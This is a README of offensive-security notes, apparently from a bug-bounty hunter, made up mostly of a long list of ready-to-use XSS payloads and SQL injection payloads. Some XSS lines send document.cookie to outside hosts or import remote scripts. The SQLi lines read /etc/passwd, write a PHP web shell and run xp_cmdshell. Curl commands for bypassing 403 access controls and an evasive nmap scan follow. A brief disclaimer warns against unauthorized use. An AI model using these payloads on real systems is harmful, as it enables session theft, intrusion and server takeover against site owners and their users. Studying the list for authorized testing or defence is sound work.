├── README.md
└── assets
    ├── api-example.jpg
    ├── deserialization-diagram.jpg
    ├── forbidden.png
    ├── sqli-example.png
    └── xss-example.png


/README.md:
--------------------------------------------------------------------------------
  1 | <br>
  2 | <h1 align="center">Offensive Security Miscellaneous!</h1> <br>
  3 | 
  4 | <br>
  5 | 
  6 | # Topics: <br>
  7 | 
  8 | > [XSS Related + Payload list](#--xss)
  9 | 
 10 | > [SQLi Related + Payload list](#--sqli)
 11 | 
 12 | > [cURL Related](#--curl-related)
 13 | 
 14 | > [403 Bypassing](#--bypass-403-forbidden)
 15 | 
 16 | > [Tools Related](#--tools)
 17 | 
 18 | > [APIs](#--apis)
 19 | 
 20 | <br>
 21 | <hr>
 22 | 
 23 | # - XSS
 24 | ● What is cross-site scripting (XSS)? <br>
 25 | 
 26 | Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script (JavaScript, etc), to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. XSS can cause a variety of problems for the end user, that range in severity: from an annoyance, to complete account compromising.
 27 | XSS attacks may be conducted without using `<script>...</script>` html tags. Other html tags will do exactly the same thing, for example: `<body onload=alert('test1')>` or other html attributes such as: onmouseover, onerror, onload, etc... [(source)](https://owasp.org/www-community/attacks/xss/)
 28 | 
 29 | <img src="assets/xss-example.png" alt="XSS Attack example">
 30 | 
 31 | <br>
 32 | 
 33 | > Do not use the following xss payloads in a random or unauthorized web application, I do not take any resposibility <br>
 34 | > to anyone willing to execute or exploit them on random endpoints and parameters, you have been warned!
 35 | 
 36 | ## XSS Payloads (My personal collection) <br>
 37 | 
 38 | <details>
 39 |   <summary>🔴 Click to view my personal custom list of XSS Payloads</summary>
 40 | 
 41 |   ```
 42 |   --- Important Note ---
 43 |   --- Please do consider that these payloads are used not for fuzzing nor to be added to a wordlist, ---
 44 |   --- there are many payloads here that would need additional actions to properly work. ---
 45 |   --- But of course, if you do wish to add some of them to a wordlist, then there's no problem at all! ---
 46 |   --- I also add commentary about every/most of the payloads in the commit history --
 47 |   
 48 |   <script>alert(document.domain+"\n\n"+document.cookie);<script>
 49 |   </script><svg><script/class=rodric>alert(1)</script>-%26apos;
 50 |   </SCRIPT>"><svg/OnLoad="`${prompt``}`">exemplo
 51 |   ""><svg/onload=alert(1)>%27/---+{{77}}"
 52 |   ;//<!----><SCRIPT>alert(1);</SCRIPT><svg onload="alert(document.domain)">
 53 |   ;//<!----><SCRIPT>alert(1);</SCRIPT><svg onerror="alert(document.write(1337))">
 54 |   <svg onload='alert(1)'
 55 |   <svg onload="alert(1)"
 56 |   <svg onload=alert(1)//
 57 |   <svg onload=alert(1)+
 58 |   <svg onload=alert(1)<!--
 59 |   <svg/onload=window.alert();//
 60 |   <!--><svg/onload=window.alert();//
 61 |   "><img src =" x "oerror = " alert ('RodricBr); ">
 62 |   "><script><svg/alert%20(document.cookie)</script>
 63 |   %22on%3eerror=%22prompt(document.domain)
 64 |   %27%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
 65 |   %3Cscript%3Ealert(document.domain);%3C/script%3E
 66 |   --><font color=blue><h1>xss<img src onerror=alert(`XSS`)>/
 67 |   "onmouseover=alert(1)//
 68 |   %3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
 69 |   'onerror=%22alert%60kauenavarro%60%22testabcd))/
 70 |   %3cscript%3eprompt(document.domain)%3c%2fscript%3e
 71 |   javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
 72 |   1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.domain%29%3C/ScRiPt%3E
 73 |   '"()%26%25<acx><ScRiPt%20>alert(document.domain)</ScRiPt>
 74 |   '();}]9676"></script><script>alert(document.domain)</script>
 75 |   "%20"><input><img src=x onerror=alert(document.domain)>%3
 76 |   %22%3E%3C%2Fa%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28document.cookie%29%3B%3E%3C%2Fscript%3E
 77 |   %3Cmarquee%20loop%3d1%20width%3d0%20onfinish%3dco\u006efirm(document.cookie)%3EXSS%3C%2fmarquee%3E
 78 |   "><svg+svg+svg\/\/On+OnLoAd=confirm(document.cookie)>
 79 |   javascript:alert(document.domain)
 80 |   %22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3B%3E
 81 |   %22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28POCkauenavarroxss%29%3E
 82 |   ;'"/'/><svg/onload=confirm('teste
 83 |   '%22()%26%25<acx><ScRiPt%20>alert(1)</ScRiPt>
 84 |   <ScRiPt>prompt%289371%29<%2FScRiPt>=<ScRiPt>alert%28document.domain%29<%2FsCrIpT>
 85 |   0%0d%0a%0d%0a23%0d%0a<svg%20onload=confirm(document.domain)>%0d%0a0%0d%0a
 86 |   %27x%27onclick=%27alert(1)
 87 |   onMouseOvER=prompt(/xss/)//
 88 |   %27%20onclick=alert(document.domain)%20accesskey=X%20
 89 |   %3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E
 90 |   asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie)
 91 |   <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
 92 |   <// style=x:expression\28write(1)\29>
 93 |   <!--[if]><script>alert(1)</script -->
 94 |   <a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>@cr:0xInfection
 95 |   <script>eval(atob(decodeURIComponent("payload")))//
 96 |   <a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere
 97 |   <svg onx=() onload=(confirm)(1)>
 98 |   <a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>teste</a>
 99 |   <svg onload=prompt%26%230000000040document.domain)>
100 |   <svg onload=prompt%26%23x000000028;document.domain)>
101 |   xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
102 |   1'"><img/src/onerror=.1|alert``>
103 |   <--`<img/src=` onerror=confirm``> --!>
104 |   javascript:{alert`0`}
105 |   <base href=//knoxss.me?
106 |   <a69/onclick=[1].findIndex(alert)>sussy
107 |   <input/oninput='new Function`confir\u006d\`0\``'>
108 |   <p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
109 |   <svg/onload=prompt(1);>
110 |   <isindex action="javas&tab;cript:alert(1)" type=image>
111 |   <marquee/onstart=confirm(2)>
112 |   3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{
113 |   0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
114 |   <table background="javascript:alert(1)"></table>
115 |   "/><marquee onfinish=confirm(123)>a</marquee>
116 |   <svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
117 |   <x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme
118 |   <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
119 |   <a69/onclick=write&lpar;&rpar;>hi
120 |   <svg/onload=self[`aler`%2b`t`]`1`>
121 |   anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
122 |   "/><svg+svg+svg\/\/On+OnLoAd=confirm(1)>
123 |   <img src=x onerror=alert('XSS')>.png
124 |   "><img src=x onerror=alert('XSS')>.png
125 |   "><svg onmouseover=alert(1)>.svg
126 |   <<script>alert('xss')<!--a-->a.png
127 |   java%0dscrip%0d%1b%1bt:console.log`${document.cookie}`}
128 |   java%0dscrip%0d%1b%1bt:console.log`${location=`https://www.pudim. com?c=${document.cookie}`}
129 |   "><x onauxclick=a=alert,a(domain)>click
130 |   <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
131 |   <sc%00ript>confirm(1)</script>
132 |   \"><iframe/src=javascript:alert%26%23x000000028%3b)>
133 |   \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7
134 |   jaVasCript:/*-/*`/*\`/*'/*"/**/(/*+*/oNcliCk=alert()+)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
135 |   <data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
136 |   <Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
137 |   <Video><source onerror = "javascript: alert (XSS)">
138 |   <Input value = "XSS" type = text>
139 |   <applet code="javascript:confirm(document.domain);">
140 |   <isindex x="javascript:" onmouseover="alert(document.domain)">
141 |   "></SCRIPT>''>'><SCRIPT>alert(String.fromCharCode(88.83.83))</SCRIPT>
142 |   "><img src="x:x" onerror="alert(document.domain)">
143 |   "><iframe src="javascript:alert(document.domain)">
144 |   <object data="javascript:alert(document.domain)">
145 |   <isindex type=image src=1 onerror=alert(document.domain)>
146 |   <img src=x:alert(alt) onerror=eval(src) alt=0>
147 |   <img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
148 |   <iframe/src="data:text/html,<svg onload=alert(document.domain)>">
149 |   <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(document.domain)" http-equiv="refresh"/>
150 |   <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
151 |   <meta http-equiv="refresh" content="0;url=javascript:confirm(document.domain)">
152 |   <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
153 |   <form><a href="javascript:\u0061lert(document.domain)">X
154 |   </script><img/*%00/src="worksinchrome&colon;prompt(document.domain)"/%00*/onerror='eval(src)'>
155 |   <style>//*{x:expression(alert(/document.domain/))}//<style></style>
156 |   <img src="/" =_=" title="onerror='prompt(document.domain)'">
157 |   <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa href=j&#97v&#97script:&#97lert(document.domain)>CLICK
158 |   <form><button formaction=javascript&colon;alert(document.domain)>CLICK
159 |   <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
160 |   <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
161 |   <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:confirm(document.domain)"></OBJECT>
162 |   javascripT:eval('var a=document.createElement(\'script\'):a.src=\'https://ofjaaaah.xss.ht\':document.body.appendChild(a)')
163 |   %3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E
164 |   %3Cx%20y=1%20z=%271%26apos;%27onclick=self[`al`%2B`ert`](1)%3E%23CLICK%20MEE
165 |   0%3Bdata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgUE9DbCIpPC9zY3JpcHQ%22HTTP-EQUIV%3D%22refresh%22
166 |   xss><svg/onload=globalThis[`al`+/ert/.source]`1`//
167 |   "-top['al\x65rt']('sailay')-"
168 |   <div onactivate=confirm('Xss') id=xss style=overflow:scroll> 
169 |   ><div onactivate=confirm('Xss')> 
170 |   <a href="javas%09cript:[1].map(top['ale'+'rt'])">
171 |   <a href="jav%0Dascript&colon;alert(1)">
172 |   <svg/onload=location=javas+cript:ale+rt%2+81%2+9;//
173 |   '/><img/src/onerror=confirm(1)>
174 |   %E2%80%A8%E2%80%A9confirm(1)
175 |   ;confirm(document.domain)//
176 |   ;onerror=alert;throw%201
177 |   <input autofocus ng-focus=”$event.path|orderBy:’[].constructor.from([1],alert)’”>
178 |   <textarea onbeforecopy=alert(1) autofocus>XSS</textarea>
179 |   <textarea onbeforecut=alert(1) autofocus>XSS</textarea>
180 |   <textarea onbeforepaste=alert(1) autofocus></textarea>
181 |   <tfoot id=x tabindex=1 onbeforedeactivate=alert(1)></tfoot><input autofocus>
182 |   <tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus>
183 |   <th oncopy=alert(1) value="XSS" autofocus tabindex=1>test
184 |   <th oncut=alert(1) value="XSS" autofocus tabindex=1>test
185 |   <th ondblclick="alert(1)" autofocus tabindex=1>test</th>
186 |   <th onfocusout=alert(1) tabindex=1 id=x></th><input autofocus>
187 |   javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
188 |   ');}</script><img src=q onerror=confirm(document.domain)>
189 |   "><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click
190 |   <details onauxclick=confirm`xss`></details>
191 |   <x onauxclick=a=alert,a(domain)>click
192 |   <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
193 |   <a href="javas%09cript:[1].map(top['ale'+'rt'])">
194 |   <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
195 |   "><svg/on</script>laod=alert>
196 |   <ijavascriptmg+src+ojavascriptnerror=confirm(1)>
197 |   </ScRiPt><img src=something onauxclick="new Function `al\ert\`xss\``">
198 |   javascript:new%20Function`al\ert\`1\``;
199 |   <b/onanimationstart=prompt`${document.domain}&#x60;>
200 |   <style>@keyframes a{}b{animation:a;}</style>
201 |   <sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//
202 |   <Svg Only=1 OnLoad=confirm(1)>
203 |   JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> 
204 |   </Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
205 |   "><svg onload=prompt%26%230000000040document.domain)>
206 |   "><svg onload=prompt&#0000000040document.domain)>
207 |   "><svg onload=alert%26%230000000040"1")>
208 |   "><svg onload=prompt%26%23x000000028;document.domain)>
209 |   Supremo-XSS"><body %00 onControl hello onmouseleave=confirm(domain) x>XSS
210 |   Supremo-XSS"><html><select %00 onControl onpointerenter=prompt(domain) hello>
211 |   Supremo-XSS"><input %00 onControl hello oninput=confirm(domain) x>
212 |   "()%26%25<acx><ScRiPt%20>N8Zn(9266)</ScRiPt>
213 |   <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/AmoloHT/`>
214 |   '`&quot;&gt;<svg onmouseover=confirm(document.domain)>
215 |   <p title=" </noscript><style onload=alert(document.domain)//">
216 |   %0d%0a</script><img+src=x+onerror=alert(document.domain)>
217 |   %0d%0a</script><h1+onmouseover=alert(document.cookie)>mouseOver</h1>
218 |   <a href=//X55.is autofocus onfocus=import(href)>%3Ca+href=//X55.is+autofocus+onfocus=import(href)%3E
219 |   <a href=javascript:'\74svg/onload\75alert\501\51\76'>
220 |   -20a")});a=alert;a(1);//
221 |   valor%0aalert(1)%3C/script%3E
222 |   <svg onload=a=')',b='t(1',j='javas',s='cript:aler',location=j+s+b+a>
223 |   "/><svg onauxclick=&#x63&#x6F&#x5C&#x75&#x30&#x30&#x36&#x65&#x66&#x69&#x72&#x6D(\1\)>
224 |   "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
225 |   <svg><animate%20onend=alert(document.cookie)%20attributeName=x%20dur=1s>
226 |   <h1/%6f%6e/oNclicK=alert`hacked`>APTH
227 |   "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
228 |   "><D3V%0aONPoiNtERENTEr%0d=%0d[document.cookie].find(confirm)%0dx>
229 |   " onmouseenter=confirm(1)//
230 |   '%20onmouseenter=confirm(1)//
231 |   <Svg+OnLoad=import(%27//X55.is%27)>#alert(document.domain)//
232 |   %22%27%22%3E%3CMETA%20HTTP-EQUIV%3Drefresh%20CONTENT%3D1%3E%3F%3D
233 |   <form action="@collaberator.burpcollaborator.net">Password:<br><input name="p"><br><input type="submit" value="Join meet"></form><\!--
234 |   <a/+/OnMoUsEOVEr+=+(confirm)(document.domain)>
235 |   /(A('onerror=%22alert%601%60%22testabcd))/
236 |   /Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders
237 |   (A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f
238 |   "%20onmouseenter=confirm(document.domain)%20value="
239 |   '"onclick=(co\u006efirm)?.0><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)1"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1>    
240 |   <iMg/srC/onerror=alert2>%22%3E%3CSvg/onload=confirm3//<Script/src=//ChiragXSS.xSs.ht></scripT>
241 |   "><svg onload=document.forms[1].action='http://localhost/?Hacked'>
242 |   ">&lt;<![\CDATA[<]]>img src=x onerror=prompt(document.domain)&gt;
243 |   <svg/onload=eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))>
244 |   <svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>
245 |   <svg onload='new Function`["_Y000!_"].find(al\u0065rt)`'>
246 |   <img/src=`%00`%20onerror=this.onerror=confirm(1)
247 |   <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
248 |   <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
249 |   ''""><a OnpoINTeRENtEr=confirm(document.domain)x>
250 |   javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
251 |   %7B%7Bconstructor.constructor(%27confirm(document.domain)%27)()%7D%7D
252 |   "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
253 |   "document.body['innerHTML']=atob('PGltZyBzcmM9InRlc3RlLnBuZyIgb25lcnJvcj0iYWxlcnQod2luZG93Lm9yaWdpbikiPg==')
254 |   %0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E
255 |   %26%2302java%26%23115cript:alert(document.domain)
256 |   "><button%20popovertarget=x>Click%20me</button>%0A<xss%20onbeforetoggle=location=`javas`%2B`cript:ale`%2B`rt%2`%2B`81%2`%2B`9`%20popover%20id=x>XSS</xss>
257 |   %3Cxss%20contenteditable%20onbeforeinput=alert(1)%3Etest
258 |   %27%3E%0A%3C!--%3E%3Ca%20href=%22javascript:import(%27%2f%2fX55.is%27)%22%3ECLICK%3C/a%3E%0A%3C!--%3E
259 |   %22bestxss=%3E%3Cxss%20contenteditable%20onbeforeinput=%22a='import(%60/%09/x55.is//%60)';b='javascript:';location=b%2Ba%22%3ESEARCHHERE%3C!--.html
260 |   <details open onToGgle=abc=(co\u006efirm);abc(VulneravelXSS&#00000000000000000041//
261 |   %22%3E%3Ca%20href=%22javascript%26%2358%3Bconfirm(1)%22%3E
262 |   %22%3E%3Ca%20href=%22javascript%26colon;confirm(1)%22%3E
263 |   javascript:%26%23x3A%3Bconfirm(1)
264 |   <vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">
265 |   <video><source onerror="alert.constructor.constructor('return this')().alert('‏0f')">
266 |   [][`filter`][`constructor`](String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()  %22%3E%3Cxss%20contenteditable%20onbeforeinput%3D%22a%3D%27promp%27%3Bf%3D%27t%27%3Bb%3D%27%28%27%3Bc%3D%271%27%3Bd%3D%27%29%27%3Be%3D%27javascript%3A%27%3Blocation%3De%2Ba%2Bf%2Bb%2Bc%2Bd%22%3EGREPSTRING%3C
267 |   %22%3E%3Cxss%20contenteditable%20onbeforeinput=%22a='promp';f='t';b='%26%230000000040';c='1';d='%26%230000000041';e='javascript:';location=e%2Ba%2Bf%2Bb%2Bc%2Bd%22%3EGREPSTRING%3C
268 |   %22%3E%3Cxss%20contenteditable%20onbeforeinput=%22a='promp';f='t';b='(';c='1';d=')';e='javascript:';location=e%2Ba%2Bf%2Bb%2Bc%2Bd%22%3EGREPSTRING%3C
269 |   <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
270 |   1'"><INPUT HRef=\" AutoFocus OnFocus="var a='ale';var b='rt';var c='()';top[a+b]`11`"><"
271 |   ';k='e'%0Atop['al'+k+'rt'](1)//
272 |   <Img Src=OnXSS OnError=alert(1)>
273 |   <Img Src=//X55.is OnLoad%0C=import(Src)>
274 |   2%22%3E%3C!--%3E%3Cinput%20autofocus%20id=//X55.is%20onfocus=import(id)%3E#alert(document.cookie)
275 |   %3Csvg%3E%3Ca%20xmlns:xlink=http://www.w3.org/1999/xlink%20xlink:href=?%3E%3Ccircle%20r=400%20/%3E%3Canimate%20attributeName=xlink:href%20begin=0%20from=javascript:alert(1)%20to=%26%3E
276 |   %27%22-import(%60data:text/javascript%60%2batob(%27Ow==%27)%2b%60base64,YWxlcnQoMSk=%60)-%22/
277 |   -->"'/></script><deTailS open x=">" ontoggle=(co\u006efirm)``>
278 |   (function(x){this[x+`ert`](1)})`al`
279 |   window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
280 |   document['default'+'View'][`\u0061lert`](3)
281 |   ```
282 | </details>
283 | 
284 | <br>
285 | 
286 | <hr>
287 | 
288 | <br>
289 |     
290 | # - SQLi
291 | ● What is SQL Injection? <br>
292 | 
293 | SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.
294 | Consists of an insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. [(source)](https://owasp.org/www-community/attacks/SQL_Injection)
295 | 
296 | <img src="assets/sqli-example.png" alt="SQL Injection attack example">
297 | 
298 | ## SQLi Payloads <br>
299 | - Advanced SQL Injection payloads for endpoint/parameter fuzzing
300 | 
301 | <details>
302 |   <summary>🔴 Click to view my personal custom list of SQL Injection Payloads</summary>
303 |   
304 |   ```txt
305 |   ' /*!50000union*/ select 1,2,3,4,5,6,7,8,'data://text/plain,<?php echo system("uname -a");?>'-- -
306 |   ' /*!50000union*/ select 1,2,3,4,5,6,7,8,'data://text/plain,<?php $a="sy";$b="stem";$c=$a.$b; $c("uname -a");?>' -- -
307 |   ’ /*!50000union*/ select 1,2,3,4,5,'../index',7,8,'php://filter/convert.base64-encode/resource=.' -- -
308 |   admin' and (select * from(select(sleep(40)))SQLI) and 'abc' = 'ab
309 |   -1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,LOAD_FILE('/etc/passwd'),NULL;#
310 |   -1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,"<?php echo shell_exec($_REQUEST['cmd']);?>",NULL INTO OUTFILE '/var/www/html/c.php';#
311 |   (select(0)from(select(sleep(20)))v)/*'+
312 |   (select(0)from(select(sleep(20)))v)+'\"+
313 |   (select(0)from(select(sleep(20)))v)+\"*/
314 |   '+(select*from(select(sleep(20)))a)+'
315 |   xxxx'; EXEC xp_cmdshell 'ping interact';--
316 |   orwa' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)--
317 |   1' OR NOT 2470=2470--
318 |   orwa'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||'
319 |   -1+/*!12345UnIoN*//**/(/*!12345SEleCt*//**/ 1,2)+ — +
320 |   0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
321 |   'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
322 |   1' Union Select 1-- -
323 |   1%27/**/%256fR/**/50%2521%253D22%253B%2523
324 |   "0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z",
325 |   query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login
326 |   ' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
327 |   ```
328 | </details>
329 | 
330 | ### BLIND SQL Injection <br>
331 | - BLIND SQL Injection in the X-Fowarded-For HTTP Header.
332 | - In an attempt to bypass authorization schema.
333 | 
334 | ```http
335 | X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
336 | ```
337 | 
338 | <br>
339 | 
340 | <hr>
341 | 
342 | <br>
343 | 
344 | # - cURL Related
345 | ● What is [cURL](https://linux.die.net/man/1/curl) is a tool to transfer data from or to a server.? <br>
346 | 
347 | cURL is a command-line interface(CLI) tool for transferring data specified with URL syntax.
348 | 
349 | ## Bash/Shell script to check server's HTTP response code
350 | 
351 | ```bash
352 | #!/bin/bash
353 | 
354 | echo -e "\n$1 \t[$CODE_]"
355 | CODE_=$(curl -w "%{http_code}\n" -s -o /dev/null "$1")
356 | ```
357 | > Change the program permission to executable using chmod +x, <br>
358 | > passing the first argument($1) as the target domain.   
359 | 
360 | ## cURL .NET Serialized object grabber
361 | - .NET Deserialization.
362 | 
363 | The first thing to note about this whole process is that essentially serialization is just a fancy word for converting objects in a program's memory into another format that is easier to share or send over the network. These "serialized" formats are usually quite easy for humans to read, especially when compared to the raw binary format they are stored as in memory. XML and JSON are common examples of these easy to read serialization formats.
364 | Deserialization is, as the name suggests, the opposite process. Converting back from XML/JSON/etc into a .NET object in memory that the program can work with.
365 | 
366 | <img src="./assets/deserialization-diagram.jpg" alt="Deserialization Diagram">
367 | 
368 | ### Greping for **__VIEWSTATE** variable in a determined domain: <br>
369 | 
370 | ```bash
371 | curl -v -s -k https://www.website.com/Login.aspx | grep VIEW >> output.txt
372 | ```
373 | 
374 | ### Grabbing only the objects on the output file & throwing the objects into stdout: <br>
375 | 
376 | ```bash
377 | cat output.txt | awk -v value="[teste]>>> " '{print value$5}' | tr -d value=\" | awk '{print $2}' | sed 'G'
378 | ```
379 | 
380 | <br>
381 | 
382 | <hr>
383 | 
384 | <br>
385 | 
386 | # - Bypass 403 Forbidden 
387 | - Mind maps for 403 Bypass: **https://github.com/KathanP19/HowToHunt/tree/master/Status_Code_Bypass**
388 | - [Bypassing 403 medium post](https://medium.com/@dufferhackers/403-forbidden-bypass-technique-eda321012baa)
389 | 
390 | HTTP 403 is an HTTP status code meaning access to the requested resource is forbidden. The server understood the request, but will not fulfill it, due to lack of privilege on the application.
391 | 
392 | <img src="./assets/forbidden.png" alt="403 Forbidden">
393 | 
394 | <br>
395 | 
396 | ## 403 Bypass method using cURL: <br>
397 | 
398 | Tips: Try adding `./`, `//` after the url <br>
399 | - Example: `site.com/./` OR `site.com//`
400 | 
401 | Try using different request methods to access the unauthorized file/path: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`.
402 | Check the response headers, maybe some information can be given. For example, a 200 response to HEAD with Content-Length: 55 means that the HEAD request method can access the info. But you still need to find a way to exfiltrate that info.
403 | Using a HTTP header like `X-HTTP-Method-Override: PUT` can overwrite the request method used.
404 | Use TRACE request method and, if you are very lucky, maybe in the response you can see also the headers added by intermediate proxies that might be useful as information.
405 | 
406 | Additional [content](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/403-and-401-bypasses)
407 | 
408 | ```bash
409 | curl -s -k -X GET https://www.site.com/ -v -H "X-Originating-IP: 127.0.0.1, 68.180.194.242" -H "User-Agent: GoogleBot" -H "Content-Length:0"
410 | curl -i -s -k -X GET https://www.site.com/ -H "Host: www.site.co" -H "X-rewrite-url: directory"
411 | ```
412 | 
413 | <br>
414 | 
415 | <hr>
416 | 
417 | <br>
418 | 
419 | # - Tools
420 | 
421 | ## Nmap Ultimate Scan v1 ([man](https://man7.org/linux/man-pages/man1/nmap.1.html))
422 | 
423 | nMap (Network Mapper) is a network discovery and security tool.
424 | nMap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. <br>
425 | It can also be used for web application testing.
426 | 
427 | - Replace the API-KEY with your [Shodan](https://www.shodan.io) API Key
428 | 
429 | ```bash
430 | sudo nmap --randomize-hosts -Pn 0.0.0.0 --script shodan-api --script-args shodan-api.apikey=API-KEY -v -sS --open --reason --ttl=128 -sV --top-ports=20 --min-rate=2000 -T3  --spoof-mac=google -g443 --script="not intrusive" -oN resultados.txt
431 | ```
432 | 
433 | ### Explanation:
434 | ```markdown
435 | --randomize-hosts        :: Tells Nmap to shuffle each group of up to 16384 hosts before it scans them.
436 | -Pn                      :: Skips the host discovery stage altogether.
437 | --script *               :: Invoking the script to Shodan API.
438 | -v                       :: Verbose mode.
439 | -sS                      :: TCP SYN scan.
440 | --open                   :: Show open ports.
441 | --reason                 :: Shows the reason each port is set to a specific state and the reason each host is up or down.
442 | --ttl=128                :: Tricks the Target/Firewalls of thinking the user is scanning using Windows OS.
443 | -sV                      :: -sS added with -sV means that in case a port doesn't respond with SYN/ACK, Nmap will close the conection with RST.
444 | --top-ports=20           :: Scan 20 most common ports (Can be set to any number).
445 | --min-rate=2000          :: Send packets no slower than 2000 per second.
